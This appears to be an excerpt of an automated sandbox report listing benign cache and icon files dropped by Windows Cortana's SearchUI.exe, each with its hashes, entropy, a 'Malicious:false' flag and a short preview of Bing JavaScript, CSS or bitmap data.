                                                                            Preview: /*!DisableJavascriptProfiler*/.var BM=BM||{};BM.config={B:{timeout:1e3,delay:750,maxUrlLength:300,sendlimit:20,maxPayloadSize:7e3},V:{distance:20},N:{maxUrlLength:300},E:{buffer:30,timeout:5e3,maxUrlLength:300},C:{distance:50}},function(n){function lt(){if(!document.querySelector||!document.querySelectorAll){k({FN:"init",S:"QuerySelector"});return}b={};o=[];ft=1;ut=0;rt=0;s=[];h=0;e=!1;var n=Math.floor(Math.random()*1e4).toString(36);t={P:{C:0,N:0,I:n,S:ri,M:r,T:0,K:r,F:0}};ci()}function ui(n,t){var r={};for(var i in n)i.indexOf("_")!==0&&(i in t&&(n[i]!==t[i]||i==="i")?(r[i]=t[i],n[i]=t[i]):r[i]=null);return r}function fi(n){var i={};for(var t in n)n.hasOwnProperty(t)&&(i[t]=n[t]);return i}function y(n,t,r,u){if(!e){k({FN:"snapshot",S:n});return}r=r||kt;t=t||!1;var f=g()+r;st(s,n)===-1&&s.push(n);t?(at(),vt(t,u)):f>h&&(at(),rt=sb_st(vt,r),h=f)}function k(n){var f={T:"CI.BoxModelError",FID:"CI",Name:ht,SV:ct,P:t&&"P"in t?d(t.P):r,TS:u(),ST:v},i,e;for(i in n)f[i]=n[i];e=d(f);yt(e)}funct
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\LSXA5TU8\ksGFoLlJPEAPv3E_nINrfjMObto[1].css
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):77070
                                                                            Entropy (8bit):5.207119466144056
                                                                            Encrypted:false
                                                                            SSDEEP:384:B7Nyr2SeGdDzVOwFsOB1ZgM53klAq00EWvsECx0enIh1r7UHcPhQ5nNCKq8YEc6k:B7Ny5fdDzVzOOWuxPqenQ8HcP8YErk
                                                                            MD5:2A65EE8C69A6CC4994BE335E5CA2DA06
                                                                            SHA1:42955DD6591F2850CE3ED113868BAD83DDB7BECE
                                                                            SHA-256:28347980CC14326DE860458333D0DB01BAFCBBD7B398004202E0545E41E9127A
                                                                            SHA-512:94A5C2D4B7318DE303E6AB56F624FB0CC3956B9833A44C9EFDB787008545F1664416EF66C42237706FB06DB885985B88361F6525A8B26EA223D39B3D0BDF9AE5
                                                                            Malicious:false
                                                                            Preview: .rewardsBadge,.wideByDefault .scopesList .scopeTile:not(.selectedScope){color:rgba(0,0,0,.6)}.wideByDefault .scopesList .scopeTile:not(.selectedScope):hover{color:#000}.filterIcon:focus{height:48px;width:46px}body[dir] .filterIcon:focus{margin-top:2px}body[dir='ltr'] .filterIcon:focus{margin-right:2px}body[dir='rtl'] .filterIcon:focus{margin-left:2px}.searchScopes .scopeTile{cursor:default;position:relative;align-items:center}.searchScopes a:hover{background-color:rgba(0,0,0,.1)}.scopesList{height:52px;border-bottom:1px solid rgba(0,0,0,.1);display:flex}.scopesList .scopeTile:focus{height:48px}body[dir] .scopesList .scopeTile:focus{padding:0 14px;margin:2px 2px 0}.scopesList .scopeTile,.scopesList .scopeTile:active{height:51px;display:flex}body[dir] .scopesList .scopeTile,body[dir] .scopesList .scopeTile:active{padding:0 16px;margin:0}.scopesList .scopeTile.selectedScope:focus{height:48px}.scopesList .scopeTile.selectedScope,.scopesList .scopeTile.selectedScope:active{height:52px}.scop
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\LSXA5TU8\nEl6gm6izUrrDobE23TevZhe_fI[1].css
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):66986
                                                                            Entropy (8bit):6.002532652367151
                                                                            Encrypted:false
                                                                            SSDEEP:1536:Rk0h26JqMsJrdUPBERLxAMP7a5zjEMQBNRDIu/QAwape4:Rlv1sLRMz43BNFB
                                                                            MD5:4D3E595F2CBC3A17F1AF84725C46E751
                                                                            SHA1:0825FFDBABA1A76BD3291A01E0BC37DC0287FCA5
                                                                            SHA-256:3CBDCF1C0B5C56F239D334AA89251B0D0398E4C36F0490435097E02CF5BC7EB9
                                                                            SHA-512:93B570A293843B3ABEAB8C8CC73B3B9F8B66B68E5A31F28854A6F0EDE70D1F7FE3E1821D484420F694AF280EEB7EE7B84C24DAAFE1F1FEEBA503D238204CBB51
                                                                            Malicious:false
                                                                            Preview: @font-face{font-family:"Cortana MDL2 Assets";src:url(data:application/font-woff;base64,d09GRgABAAAAAMPYAA8AAAABZLgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABPUy8yAAABWAAAAEcAAABgSk1/HFZETVgAAAGgAAACBQAABeCBXolxY21hcAAAA6gAAATGAAAHduvLLe9jdnQgAAAIcAAAACAAAAAqCdkJr2ZwZ20AAAiQAAAA8AAAAVn8nuaOZ2FzcAAACYAAAAAMAAAADAAIABtnbHlmAAAJjAAAr/MAAT7+nuWqJmhlYWQAALmAAAAANQAAADYU7N7gaGhlYQAAubgAAAAeAAAAJCI8G3pobXR4AAC52AAAAUwAAAVU35GbmGxvY2EAALskAAACuAAAArg0Ln62bWF4cAAAvdwAAAAgAAAAIAJJBQ1uYW1lAAC9/AAABTkAAAvzNvtzeXBvc3QAAMM4AAAAEwAAACD/UQB3cHJlcAAAw0wAAACJAAAA03i98g542mNg5ghnnMDAysDBOovVmIGBURpCM19kSGMS4mBl5WJkYgQDBiAQYEAA32AFBQYHBobv3RxgPoRkAKtjgfAUGBgAq2sHLQB42hXJUxQYBgAEwclf2qa2bdu2bdu2bdu2bdu2bTtlur15734WAwz4fwYZPHCIgWGoMHQYJqqD+mHDcGH4MEIYMYwURg6jhFHDaGH0MEYYM4wVxg7jhHHDeGH8MEGYMEwUJg6ThEnDZGHyMEWYMkwVpg7ThGnDdGH6MEOYMcwUZg6zhFnDbGH2MEeYM8wV5g7zhHnDfGH+sEBYMCwUFg6LhEXDYmHxsERYMiwVlg7LhGXDcmH5sEJYMawUVg6rhFXDamH1sEZYM6wV1g7rhHXDemH9sEHYMGwUNg6bhE3DZmHzsEXYMmwVtg7bhG3DdmH7sEPYMewUdg67hF3DbmH3sEfYM+wV9g77hH3Df
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\LSXA5TU8\zh8Gb8BdCdZddFgn7wQ6G86Jdok.br[1].js
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):37342
                                                                            Entropy (8bit):5.3267899861839485
                                                                            Encrypted:false
                                                                            SSDEEP:768:7nUURAWwEyypCXv8eBVjsRj838VtmJCG+A21TgXB6jAladSEPTurOiqUVXUiPKG7:D38Ey5jsRIsbmJQA4EXB6jAladSeTuTx
                                                                            MD5:F44EA9D80C88FBCDA801F3A2E0D79E8D
                                                                            SHA1:942DAC5E088686F2D09D048AA5F376DE366421E1
                                                                            SHA-256:57DEBE6CDD1AEBDE19A85A2B95AA78FD8DCA4726F12BBB0D59931E5F21F92C85
                                                                            SHA-512:2AB3D3F4551DD32F0AA7BF50660FBC28FD690C95108AA460C4C465DEF883A7D76DE1E286D3132029BECA767AE615A0DF788F91D7367CD9D0C9DA32754CB3364D
                                                                            Malicious:false
                                                                            Preview: var Microsoft,__extends,WindowsFeedback,Feedback;(function(n){var t;(function(t){"use strict";function e(t){for(var f=null,r,i,u=0;u<t.length;u++){r=t[u];try{i=r.provide()}catch(e){n.le("Query provider "+r.name+" failed",e)}if(typeof i=="string"&&i.length>0){f=i;break}}return f}function p(t){var r=t.querySelectorAll('input[type="radio"][required][name]'),i=!0;return n.Core.ForEach(r,function(n){var r=n.getAttribute("name"),u='input[type="radio"][required][name="'+r+'"]:checked',f=t.querySelector(u)!==null;i=i&&f}),i}function l(t,i){var r,u;return t===window?t.document.documentElement["client"+i]:t.nodeType===9?(r=t.documentElement,u=t.body,Math.max(u["scroll"+i],u["offset"+i],r["scroll"+i],r["offset"+i],r["client"+i])):parseFloat(n.Core.GetComputedStyle(t)[i.toLowerCase()])}function a(n,t,i){var u={},f;for(var r in t)u[r]=n.style[r],n.style[r]=t[r];f=i(n);for(r in t)n.style[r]=u[r];return f}function w(){y(!1)}function v(n){y(!0,n)}function y(t,i){n.Core.ForEach(_d.querySelectorAll('inp
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\L7KWFN4L\www.bing[1].xml
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):6175
                                                                            Entropy (8bit):5.36682740183826
                                                                            Encrypted:false
                                                                            SSDEEP:192:ofjfQIfQz5+fQfH1aOvAdsAvPoQsoQdZ+mV/vLQ2QH:ofjflfi+fc4KiswQ6KVnLJg
                                                                            MD5:F20F7BA9500B5D84BD3AABF6E0C6897D
                                                                            SHA1:FA9778383137E294A47A3EF86D96D2C6EE9C1495
                                                                            SHA-256:14434B1C6D7232A5C401963186D2750179260AE90003BCBC517FC8D10573D114
                                                                            SHA-512:7F3A4E7D9A1B1EC0DF8E671A6852B7A8428554BBB7421024FA31C996751BE44787879661B82B32B8DF4C3C346577CCE1F1E1D5AF2C6C654F83C0C01D487614AA
                                                                            Malicious:false
                                                                            Preview: <root><item name="eventLogQueue_Online" value="[]" ltime="3179865184" htime="30865871" /><item name="eventLogQueue_Online_logUploadIntervalStartDate" value="1601478891803" ltime="1913829744" htime="30840636" /><item name="eventLogQueue_Online_uploadedLogSizeInInterval" value="0" ltime="3618421648" htime="30747937" /></root><root><item name="eventLogQueue_Online" value="[]" ltime="3179865184" htime="30865871" /><item name="eventLogQueue_Online_logUploadIntervalStartDate" value="1612317368648" ltime="3282835184" htime="30865871" /><item name="eventLogQueue_Online_uploadedLogSizeInInterval" value="0" ltime="3618421648" htime="30747937" /></root><root><item name="eventLogQueue_Online" value="[]" ltime="3179865184" htime="30865871" /><item name="eventLogQueue_Online_logUploadIntervalStartDate" value="1612317368648" ltime="3282835184" htime="30865871" /><item name="eventLogQueue_Online_uploadedLogSizeInInterval" value="0" ltime="3618421648" htime="30747937" /><item name="CB47C15FA3044AB884F7
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Chrome
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):5.058439866878886
                                                                            Encrypted:false
                                                                            SSDEEP:96:P4kV7+thhFWrntTK66gsUJNj8+6fR0YP/NfhBR35Ko:nxNWjFf+YPVfhBRph
                                                                            MD5:54DB706E65E13CEFBF0B08230B92CF49
                                                                            SHA1:79CF70BD7C3BF5B15752E7F74198D978D387369B
                                                                            SHA-256:8D3060795A55F2A2319E613BE44706C9C4D6C22FB318E6F72E85C20F27E21A5F
                                                                            SHA-512:150FE5D87B711424808AFF8BCD9BC07351D1E05234BC54323D75FF83A7F013EB58B93004312C1FEB76C88465B3EAE9AEE7F8AD22FD84CDE4637D70EFCA055352
                                                                            Malicious:false
                                                                            Preview: BM............|... ... ..... ......................................... niW........................................................................................................................................................................................................................................................W..=Z...X...V...N...@...@...?...A...B..=............................................................................_...Z..yY...Z...[...Z...Z...W...I...A...A...A...A...?...?..x_...............................................................Z..UZ...[...[...[...Z...Z...Z...Y...Q...C...B...A...A...A...@...?...?..T....................................................\...\...[...[...[...[...[...[...[...[...W...I...B...B...A...A...A...A...@...@...............................................Z...\...\...\...\...\...\...[...[...[...[...Y...S.Z.D...B...B...B...A...A...A...@...@.......................................]...]...]...]...]...]...\...\...]...\...\...\...Z...W...L...C...C.
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{116229A7-9A3B-2078-DB5F-B5A20811242C}
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):3.906964992469157
                                                                            Encrypted:false
                                                                            SSDEEP:48:yyJv1cZdsqRnRPHDU3SedT8kIltCXjq/My:Zv1cZSyPjU9ikStCzq/
                                                                            MD5:5D7B70550F986FD58C8AF588D9390F92
                                                                            SHA1:729E76EEE747C565041F106878CC71191281B0AD
                                                                            SHA-256:48EBBD5DD1385364FB2FBD2FBE5041F9E06EC88E28155D5BB4CD55F791827D50
                                                                            SHA-512:126A87358816CE860650A63C8F63E1B97FFD35043665A0A77D1B785318ABD88EACDD6293D2E5B1AA91A3280242AC2B371BCFA1D8111CE00570C918013AE4204B
                                                                            Malicious:false
                                                                            Preview: BM............|... ... ..... ......................................... niW...........................................................................................................................W.................................W...............................................................................%.........................................................$.......................................................................................................................................................................................$.....................................|...|.......................................$.......................................0.........................e...]...]...]...]...]...]...]...]...e...........................0...............................%.....................g...]...]...]...]...]...]...]...]...]...]...]...]...f.......................%.............................................]...]...]...]...]...]...]...]...]...]...]...]...
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{67471CB4-015B-F9E9-FE9B-341BFA6FA6BF}
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):5.707737634015558
                                                                            Encrypted:false
                                                                            SSDEEP:48:L6INZWMW/ikSJSm9j9ykrJmgo9s/ua42GkB7ZbKPB5CXMaLLjFz4Yq:dNZLuikSJjj8KJy9QhT8PB5CXMaTFz1
                                                                            MD5:F5FDC471FF9FD6417A4C14CB8EB25DA8
                                                                            SHA1:9002F85D19F45613D99CEBF32A72EE028FB32BE4
                                                                            SHA-256:640AE58924D8AB0966EF73564BB46EEAC57F4FEFC3F7B9F22083DE387C44131D
                                                                            SHA-512:8B6FE4071D5724AA0FD2EDCEA919DF1DEBEB82E745B902461070587BC7C492CB1197153B629DBCF19DC2BDB1A6E132B7275CD5CF0FF7912378CC5BA9CE196F0B
                                                                            Malicious:false
                                                                            Preview: BM............|... ... ..... ......................................... niW....................................................................................oW7@nX8.mX9.nX9.nX9.nX9.nX9.nX9.nX9.nX9.nX9.nX9.nX9.nX9.nX9.nX9.nX9.nX9.nX9.nX9.nX9.nX9.nX9.nX9.nX9.mX9.nX8.oW7@............o[;@vfN...v...................................................................................................v.vfN.o[;@....s[?@vfO.................................................................................................................vfO.s[?@t^@.........................................................................................................................t^@.vaB......................................w...j...e...f...f...g...f...f...f...l...|........................................vaB.zeF.......................h..sS...d................................................q...t............................zeF.}hJ...........................r.................................................
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{8AA47365-B2B3-1961-69EB-F866E376B12F}
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):5.433311929343217
                                                                            Encrypted:false
                                                                            SSDEEP:48:FQUF1VaH2rRJEqdB7xi9pjJXf7Hn75TtwieKHgGdnj/7kN0cL/JOSJiJx8Vc:FHMqPzxiV7NZ1PHHtcLMSJ2kc
                                                                            MD5:7F3ECF5DE354DC3562D8A8DF65716D18
                                                                            SHA1:224E8A01E2BA10C5E71FA7DBCB7EFC61BD5C91E6
                                                                            SHA-256:FDD71FB9508790789A49A73D21CB24D68905320A68A0FB359C189AF9C17EC961
                                                                            SHA-512:E2EC81505925807658FCD2662B30E0945D8435758A03F46E6E6FF8FF6D9801D319D302C77370C9E969F557C53575C757B8A90FACFA89B3F87B9DBD036B7AC427
                                                                            Malicious:false
                                                                            Preview: BM............|... ... ..... ......................................... niW........................................................................................................................................................................................................................................................dd\Bzyq.xwm..}u.~~v...~.............U............................................................................UUU.lld.]\R.^[Q.h_R.ugV..o]..yg...t.........................................................................................ZWOW_]R.TQG.RF;.ZF6.n^O...|...........................................y....................................................bbY.WVL.LD=.D61.rol.........................................................................................................a`V.USJ.MGA.XTQ.............................................................................................................edZ.WUL.PJG.y|}...................................................
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{8ABD94FB-E7D6-84A6-A997-C918EDDE0AE5}
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):5.805922576270289
                                                                            Encrypted:false
                                                                            SSDEEP:96:Y+xmVQWFVMdQvI+Lndz+7VL4sE4r7Dccx:VxYQWM29Ld+ue/z
                                                                            MD5:76BEF4FFA8C2C3E87A098ADC690E5409
                                                                            SHA1:C5B3940E0C0C30C6C6CD02740627EC9877B890E0
                                                                            SHA-256:BF507D1E4BA343BD33CAA0C6D043A617C49D22269C335A4D636B828F3FF0C2DB
                                                                            SHA-512:CFEC8FB6F3F828716BDBEFC7E612B7AF4EB631B6B18CDFF1086E40F3F1479D5DDCAE926D05B45093E04D49EDD85FB0ED56489ABAC4D74878A47ED3CCCBC69F94
                                                                            Malicious:false
                                                                            Preview: BM............|... ... ..... ......................................... niW............................................................................................................................................maa.j_WCpf]mzpf2............................................................................................UUU..mm.xpi"ypdTvncvwpc.|tg.yoe......}t9........................................................................UUU...m..xk&uobP~ui..xk..wm.zo..|o..zm..xk.uka.........|tj.ync.......................................................t...t...rb.|p..}q...u.w...w...v...t...r..|p..zn..xl.uka.................UUJ...................................x...{:...a..}...|...}.................~...{...z...z...t...s..}p..zn.uka.................vpf.................................................................................y...u...u...v...r..zn.uka....................................................................................................uka..|o...y...y...r..zn.uka.......
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{923DD477-5846-686B-A659-0FCCD73851A8}
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):5.191498081073383
                                                                            Encrypted:false
                                                                            SSDEEP:48:nPeINB8/0eugDfg4YW701Bj6ulflejMd+L0S6tozkmmKNONE/kjMwx:nmz0j6g4VQDjJflB+L070klK0NS
                                                                            MD5:02067E9A35B6374B15508DDA20E309B6
                                                                            SHA1:DC3795BBF873C7C6D5CD1E9B7C472409DFD4D180
                                                                            SHA-256:A4585BD81BAEE320A80A3FA94FE570D397471E3EDC0ED6C5CC68C37ED989E2B5
                                                                            SHA-512:A5CA8DA45FE8EF272D5624D35697120DE613EB3CAB596D642EEC6817030FED690E5609FAF4163483640DD0EC4B2CC8528F3A93A78D3828A5880119D6394911B1
                                                                            Malicious:false
                                                                            Preview: BM............|... ... ..... ......................................... niW.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................6.......)...........................................................................................................................T...:........................................................................................................................!!!q...!...2..........................................................................................
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{BB044BFD-25B7-2FAA-22A8-6371A93E0456}
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):4.758563700930361
                                                                            Encrypted:false
                                                                            SSDEEP:48:AsMwspd6BPm0zLpQI9Urwe+DKxEgqlMuGaBd7uZyke1Hys/JoXv9cP3gzLq:As2av5D81yGEBukV7J/wPq
                                                                            MD5:8E6D38C05648D924A901360DF20B6287
                                                                            SHA1:BC593ED6F1C90710E600BE27F11503CC75A02416
                                                                            SHA-256:56C184A2F8537A6443920B3E34F1AB077D099400873FEF5AA97135B6AC425A99
                                                                            SHA-512:256E36761E5EE3D34D05F04EAD075BD62747414FA809A82B5DBA2DCDDA055E735BC80623F83FFA573E6A0AA6F1799D709E7B26B370CB79D0E4B7E30072E44E64
                                                                            Malicious:false
                                                                            Preview: BM............|... ... ..... ......................................... niW.........................................................................................................................................................UU..]U?.]U?.]U?......"..........................................................................................]U..]RW.]S..eX..aU...r.....j]./;Fp...).....................................................................\U!.]RW.]S..^R.eX..ob...~.................j]......j]....C...).............................................^U..^QT.^S..^R._S...}.................................j]......j]....U...C...'.........................................ob.........q]...............................~...~.....j]......j]....U...C...1...'...............................Z.....}{.vsr...z..q]................}...z...y...{...~............j]......j]....Q...C...-...#.....................................j]...{...{..q]...~...y..~..[L..'"..$ ..[M.............
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{BD3F924E-55FB-A1BA-9DE6-B50F9F2460AC}
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):4.9826129309850105
                                                                            Encrypted:false
                                                                            SSDEEP:48:UIfKylkvxwd4gSBlgRhb6SgPq9lxVz9hlTugsx46ZANlricma+zg2:UIvlgxu4gSBlgD6SyKVz5TugsY3+
                                                                            MD5:CBB8AE398BA523FF31BE3B249422BB01
                                                                            SHA1:30DE755C061E38E1FB1E93602C6D285AC111D0C7
                                                                            SHA-256:042A7C0FBC8324405B93B1D82D41327B64A006B74D849060A318B6B8FDBA53E6
                                                                            SHA-512:3F8614107DFB089A1FE07449D130852065765209EA18050BF000902CD188AD2FE63B0E291ED54A42DC54825FBD9BAD07DEE325CE593F0E7643472E034E09ED7B
                                                                            Malicious:false
                                                                            Preview: BM............|... ... ..... ......................................... niW.....................................................................................................................................................x...x...x...x...x...x...x...x...x...x...x...x...x......................................................]XN1>6.~###f............K...K...I...E...D...C...^...?...,...,...,...?....x........................................{H..{...{...~...~.c[Q.....SVS...."....3...3...$...$..."... ...5........y...y...y.......x............................{...{..{...{...}.......F...Q.le[................zK...K...M...H...G...F...`...?...,...,...,...?....x..................................................U..,..jbX.................3...3...+...*...(...%...9........y...y...y.......x........................................................~.jbX.................K...K...R...L...J...I...d...?...,...,...,...?....x....................................~..yq.ztl.upi.}xq...x.le[.................3...3...1.
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{C1C6F8AC-40A3-0F5C-146F-65A9DC70BBB4}
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):5.462538552372063
                                                                            Encrypted:false
                                                                            SSDEEP:48:IZFpPp6KZl3n7B+2eJEPzhzDW5L15Qv0wTtDtx/+uBFhhRGjuGZFBuvvRyGX7V0N:IL6y37BSEbhWVQv0wTNtN+MhUIBN
                                                                            MD5:288F6275691FEDE9909381A7BD043D47
                                                                            SHA1:ABC7B748913DD612CDE29DCB16E52E6E6C4E2EBE
                                                                            SHA-256:8759C9A3F2028F7A5D90D66C45238F7ACDEBD0B16BEB6FBD5CA394A4DE955B83
                                                                            SHA-512:0D65EE968AFD92BA62DD6B8E81A4BDE064411829E8043160F7F1C85F732CF04EA91467F8B1C9E23B6EE7F667CA030FAF6CCAB7980C53A70475399FFA22F6B5DB
                                                                            Malicious:false
                                                                            Preview: BM............|... ... ..... ......................................... niW....................................................................................................................ggn%jjj`jjj.jjk.jjj.iij.iij.jjj.jjk.jjj.jjj`ggn%........................................................................kkk@ttu.................................................ttu.kkk@........................................................iii"|||.............................{{{.zzz.............................|||.iii"............................................jjjC................................................................................jjjC....................................hhkN........................................................................................hhkN............................jjjC............................................................................~|{.............jjjC....................iii"....................................................................
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{C804BBA7-FA5F-CBF7-8B55-2096E5F972CB}
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):5.433311929343217
                                                                            Encrypted:false
                                                                            SSDEEP:48:FQUF1VaH2rRJEqdB7xi9pjJXf7Hn75TtwieKHgGdnj/7kN0cL/JOSJiJx8Vc:FHMqPzxiV7NZ1PHHtcLMSJ2kc
                                                                            MD5:7F3ECF5DE354DC3562D8A8DF65716D18
                                                                            SHA1:224E8A01E2BA10C5E71FA7DBCB7EFC61BD5C91E6
                                                                            SHA-256:FDD71FB9508790789A49A73D21CB24D68905320A68A0FB359C189AF9C17EC961
                                                                            SHA-512:E2EC81505925807658FCD2662B30E0945D8435758A03F46E6E6FF8FF6D9801D319D302C77370C9E969F557C53575C757B8A90FACFA89B3F87B9DBD036B7AC427
                                                                            Malicious:false
                                                                            Preview: BM............|... ... ..... ......................................... niW........................................................................................................................................................................................................................................................dd\Bzyq.xwm..}u.~~v...~.............U............................................................................UUU.lld.]\R.^[Q.h_R.ugV..o]..yg...t.........................................................................................ZWOW_]R.TQG.RF;.ZF6.n^O...|...........................................y....................................................bbY.WVL.LD=.D61.rol.........................................................................................................a`V.USJ.MGA.XTQ.............................................................................................................edZ.WUL.PJG.y|}...................................................
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{DAA168DE-4306-C8BC-8C11-B596240BDDED}
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):3.177035776003501
                                                                            Encrypted:false
                                                                            SSDEEP:48:vpvfrCnlIb0aYkmsNMc+ilim1XIx62AO:vRCn9CdL2
                                                                            MD5:5C7F2F887D97780DDAEF2F11E97CD279
                                                                            SHA1:CEAF71B52B680CACDEABFBB42D5986B4E54B1F28
                                                                            SHA-256:C4B47B90FC398FE44FD747248F870D8B2BDFE95F808A04AEB30500B33026A8EC
                                                                            SHA-512:70C1821FACAD29F79CF730976C8174F8AFBF04F8F3818690E74C5EE549EB5B62A708DD8CA048EC0D7863CE9C7D0E8AE0E8C0386C277F1EC98E57E928AFB29DA8
                                                                            Malicious:false
                                                                            Preview: BM............|... ... ..... ......................................... niW....................................................................................................................................................................................................................................................................TGG.TGG.TGG.xrn....[............................................................................................................_QKX........rda.................................................................................................................SC>1........TJI.................................................................................................................7((R........6-)...."........................................................................................................=;:................zts...._.................................................................................................||.....URRW........3..<........fe
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{F4DE281A-828F-1F6E-5CBF-B09D699BAD75}
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):5.707737634015558
                                                                            Encrypted:false
                                                                            SSDEEP:48:L6INZWMW/ikSJSm9j9ykrJmgo9s/ua42GkB7ZbKPB5CXMaLLjFz4Yq:dNZLuikSJjj8KJy9QhT8PB5CXMaTFz1
                                                                            MD5:F5FDC471FF9FD6417A4C14CB8EB25DA8
                                                                            SHA1:9002F85D19F45613D99CEBF32A72EE028FB32BE4
                                                                            SHA-256:640AE58924D8AB0966EF73564BB46EEAC57F4FEFC3F7B9F22083DE387C44131D
                                                                            SHA-512:8B6FE4071D5724AA0FD2EDCEA919DF1DEBEB82E745B902461070587BC7C492CB1197153B629DBCF19DC2BDB1A6E132B7275CD5CF0FF7912378CC5BA9CE196F0B
                                                                            Malicious:false
